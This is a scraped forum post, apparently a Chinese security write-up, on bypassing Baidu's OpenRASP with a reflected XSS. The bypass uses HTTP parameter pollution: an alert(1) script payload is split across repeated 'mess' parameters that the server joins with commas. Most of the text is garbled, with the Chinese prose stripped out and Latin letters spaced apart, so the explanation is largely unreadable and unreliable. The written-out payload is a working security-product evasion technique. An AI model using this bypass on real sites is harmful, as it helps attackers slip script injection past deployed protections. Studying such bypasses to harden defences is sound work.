[20621] 2021-06-09_一枚通过参数污染绕过百度RASP的XSS

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-06-09_一枚通过参数污染绕过百度RASP的XSS R A S P X S S   Y 1 S h u i   -     K h a n   2 0 2 1 - 0 6 - 0 9                 m e s s R A S P X S S H T T P H P P H T T P   P a r a m e t e r   P o l l u t i o n               u r l h t t p : / / e x a m p l e . c o m / s e a r c h . p h p ? i d = 6 6 6 & i d = 9 9 9               i d i d              
                p                               h i d d e n m e s s m e s s
  R A S P R A S P O p e n R A S P   使 R A S P / 使 使   X S S   p a y l o a d               使 X S S   p a y l o a d R A S P             使 :   S t e p 1               m e s s
1 2 1   S t e p 2               S t e p 3               X S S   p a y l o a d                 p a y l o a d 使 使 p a y l o a d                 v a r   a , b = a l e r t ( 1 )       # < s c r i p t > v a r   a a b                 a l e r t ( 1 ) c = 1 < / s c r i p t >     # a l e r t ( 1 ) p a y l o a d 使 < / s c r i p t > c = 1
, p a y l o a d < s c r i p t > v a r a , b = a l e r t ( 1 ) , c = 1 < / s c r i p t >   m e s s = > & < s c r i p t > v a r a & m e s s = b = a l e r t ( 1 ) & m e s s = c = 1 < / s c r i p t >   S t e p 4                   p a y l o a d R A S P p a y l o a d X S S S Q L 使
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则